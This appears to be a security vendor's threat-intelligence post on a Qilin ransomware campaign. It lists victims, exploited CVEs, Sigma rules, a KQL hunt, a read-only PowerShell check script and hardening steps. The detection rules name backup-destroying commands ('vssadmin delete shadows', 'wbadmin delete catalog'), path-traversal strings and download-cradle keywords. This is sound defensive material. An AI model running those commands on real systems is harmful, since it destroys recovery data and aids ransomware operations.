Back to Intelligence

QILIN Ransomware Campaign Targets Construction & Tech: 20 New Victims Identified

SA
Security Arsenal Team
May 22, 2026
6 min read

Date: 2026-05-22 Analyst: Security Arsenal Intelligence Unit Source: Ransomware.live / Dark Web Leak Sites

Threat Actor Profile — QILIN

Aliases: Agenda, Titan (historical association via rebranding). Model: RaaS (Ransomware-as-a-Service). Qilin operates an aggressive affiliate program, recruiting skilled initial access brokers (IABs). Ransom Demands: Variable, typically ranging from $500,000 to several million USD, largely dependent on victim revenue and exfiltrated data volume. Initial Access Vectors: Historically relies on Phishing (macro-laced documents), exploitation of exposed VPN/RDP services, and valid credentials obtained via infostealers. Recent intelligence indicates a shift toward exploiting specific internet-facing applications (see CVEs below). Double Extortion: Strictly adheres to double extortion. Exfiltrates sensitive data prior to encryption and threatens leakage on their Tor leak site if demands are not met. Dwell Time: Short. Recent observations suggest an average dwell time of 3–5 days from initial access to encryption, reducing the window for detection.

Current Campaign Analysis

Based on 20 recent victim postings between 2026-05-17 and 2026-05-22, Qilin has ramped up operations significantly.

Sector Targeting

While Qilin remains opportunistic, a distinct skew toward Construction and Technology is evident in this dataset.

  • Construction (30%): ROTO Immobilien (AT), CJ Architects (US), Air Conditioning Florida & Partners (US), RCR Industrial Flooring (AU).
  • Technology (10%): Semgrep (US) – A high-value target for intellectual property theft.
  • Manufacturing (15%): Snyder Packaging, Buckeye Paper.
  • Business Services & Consumer Services: Remain consistent secondary targets.

Geographic Concentration

  • Primary: United States (US) – ~50% of victims.
  • Secondary: United Kingdom (GB), Austria (AT), Argentina (AR), Australia (AU), Canada (CA).

CVE Correlation & Attack Vector

The surge in victims correlates directly with the exploitation of CISA Known Exploited Vulnerabilities (KEV). Based on the victim profile and confirmed exploit usage, Qilin affiliates are likely leveraging:

  1. CVE-2024-1708 (ConnectWise ScreenConnect): Allows remote code execution. Highly effective for gaining access to managed service providers (MSPs) or IT desks managing the target victims.
  2. CVE-2026-20131 (Cisco Secure Firewall Management Center): Deserialization vulnerability allowing attackers to bypass perimeter defenses or modify firewall rules to maintain persistence.
  3. CVE-2025-52691 & CVE-2026-23760 (SmarterTools SmarterMail): Authentication bypass and file upload vulnerabilities providing web shell access.

Posting Frequency

The group is maintaining a high tempo of operations, averaging 3–4 victims per day. The clustering of postings around May 20-22 suggests a coordinated "dump" following a weekend encryption wave.

Detection Engineering

The following detection logic is designed to identify the specific TTPs observed in this campaign.

SIGMA Rules

YAML
---
title: Potential ScreenConnect Path Traversal Exploit (CVE-2024-1708)
id: 86a2f91a-1234-5678-9101-abcdef123456
status: experimental
description: Detects potential exploitation of ConnectWise ScreenConnect path traversal vulnerability via suspicious URI patterns.
author: Security Arsenal
date: 2026/05/22
references:
    - https://cisa.gov/known-exploited-vulnerabilities-catalog
logsource:
    category: webserver
detection:
    selection:
        cs-uri-query|contains:
            - '..\'
            - '%2e%2e%5c'
            - 'AuthorizationHelper.asbx'
    condition: selection
falsepositives:
    - Potential rare scanning noise
level: critical
---
title: SmarterMail Suspicious File Upload Activity (CVE-2025-52691)
id: b2c3d4e5-6789-0123-4567-89abcdef012
status: experimental
description: Detects potential unrestricted file upload exploitation on SmarterMail servers.
author: Security Arsenal
date: 2026/05/22
references:
    - https://cisa.gov/known-exploited-vulnerabilities-catalog
logsource:
    category: webserver
detection:
    selection:
        cs-uri-stem|contains: '/Masters/Default.aspx'
        cs-method|contains: 'POST'
        cs-uri-query|contains: 'UpgradePackage'
    condition: selection
falsepositives:
    - Legitimate administrative updates
level: high
---
title: Qilin Ransomware Typical Process Execution Pattern
id: f3e4g5h6-7890-1234-5678-0abcdef12345
status: experimental
description: Detects behavior consistent with Qilin ransomware execution involving PowerShell and system utilities for deletion of shadow copies.
author: Security Arsenal
date: 2026/05/22
logsource:
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cli:
        CommandLine|contains:
            - 'vssadmin delete shadows'
            - 'wbadmin delete catalog'
            - 'Remove-Item' 
            - '-Recurse -Force'
    condition: all of selection_*
falsepositives:
    - Legitimate system administration (rare)
level: critical

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for lateral movement and potential Qilin staging activity
// Focuses on SMB access and abnormal PowerShell execution patterns
DeviceProcessEvents  
| where Timestamp >= ago(7d)  
| where FileName in~ ("powershell.exe", "cmd.exe", "powershell_ise.exe")  
| where ProcessCommandLine has_any ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String", "New-Object") 
| extend EncodedCommand = extract(@"-EncodedCommand\s+([a-zA-Z0-9+/=]+)", 1, ProcessCommandLine) 
| where isnotempty(EncodedCommand) 
| join kind=inner (  
    DeviceNetworkEvents  
    | where RemotePort in (445, 135, 139) and ActionType == "ConnectionSuccess"  
    | summarize ConnectionCount=count() by DeviceId, RemoteIP  
) on DeviceId  
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, RemoteIP, ConnectionCount

PowerShell Response Script

PowerShell
<#
.SYNOPSIS
    Rapid Response Hardening and Indicators Check for Qilin Campaign
    Checks for exposed RDP, unusual scheduled tasks, and VSS manipulation.
#>

Write-Host "[+] Starting Qilin Rapid Response Check..." -ForegroundColor Cyan

# 1. Check for recent Scheduled Tasks (Qilin often uses them for persistence)
Write-Host "[*] Checking for scheduled tasks created in the last 7 days..." -ForegroundColor Yellow
Get-ScheduledTask | Where-Object {
    $_.Date -gt (Get-Date).AddDays(-7)
} | Select-Object TaskName, TaskPath, Date, Author

# 2. Check Volume Shadow Copy Storage status (often deleted by ransomware)
Write-Host "[*] Checking Volume Shadow Copy existence..." -ForegroundColor Yellow
try {
    $vss = vssadmin list shadows
    if ($vss -match "No shadows found") {
        Write-Host "[!] WARNING: No Volume Shadow Copies found. Possible deletion event." -ForegroundColor Red
    } else {
        Write-Host "[+] Shadow Copies present." -ForegroundColor Green
    }
} catch {
    Write-Host "[!] Error checking VSS." -ForegroundColor Red
}

# 3. Audit RDP Users (Qilin often targets RDP)
Write-Host "[*] Enumerating active RDP sessions..." -ForegroundColor Yellow
query user

Write-Host "[+] Check Complete." -ForegroundColor Cyan


---

Incident Response Priorities

Based on Qilin's known playbook and current campaign indicators:

T-Minus Detection Checklist

  • ScreenConnect Logs: Immediate review of WebService.asmx and Login.aspx logs for path traversal attempts (..\ or %2e%2e).
  • SmarterMail / Exchange Logs: Hunt for authentication anomalies and unauthorized file uploads on web mail interfaces.
  • PowerShell Auditing: Scan for encoded commands (-EncodedCommand) and Invoke-Expression usage originating from non-admin accounts.

Critical Assets at Risk

  • Architectural Blueprints & IP: High priority for exfiltration in the Construction sector (CJ Architects, ROTO Immobilien).
  • Source Code: Critical for Technology victims (Semgrep).
  • Financial & Client PII: Universal target across all sectors.

Containment Actions

  1. Isolate: Disconnect compromised servers from the network immediately; do not shut down (preserve memory).
  2. Revoke Credentials: Force reset of passwords for all privileged accounts and any accounts logged into VPN/RDP during the breach window.
  3. Block IOCs: Block identified attacker IP addresses and domains associated with the C2 infrastructure.

Hardening Recommendations

Immediate (24 Hours)

  • Patch Critical Vulnerabilities: Apply patches for CVE-2024-1708 (ScreenConnect), CVE-2026-20131 (Cisco FMC), and SmarterMail CVEs immediately.
  • Disable Internet-Facing RDP: Ensure RDP is not accessible from the internet. Enforce VPN with MFA for all remote access.
  • Audit MFA: Ensure Multi-Factor Authentication is enforced on all external-facing applications (OWA, VPN, ScreenConnect).

Short-Term (2 Weeks)

  • Network Segmentation: Segment critical servers (file servers, domain controllers) from user workstations and internet-facing systems.
  • EDR Coverage: Ensure EDR agents are deployed and reporting on 100% of endpoints, specifically monitoring for PowerShell abuse.
  • Backup Verification: Validate that offline backups are immutable and recent. Test restoration procedures for critical construction/tech data.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebransomware-gangqilinransomwareconstructiontechnologycisa-kev

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action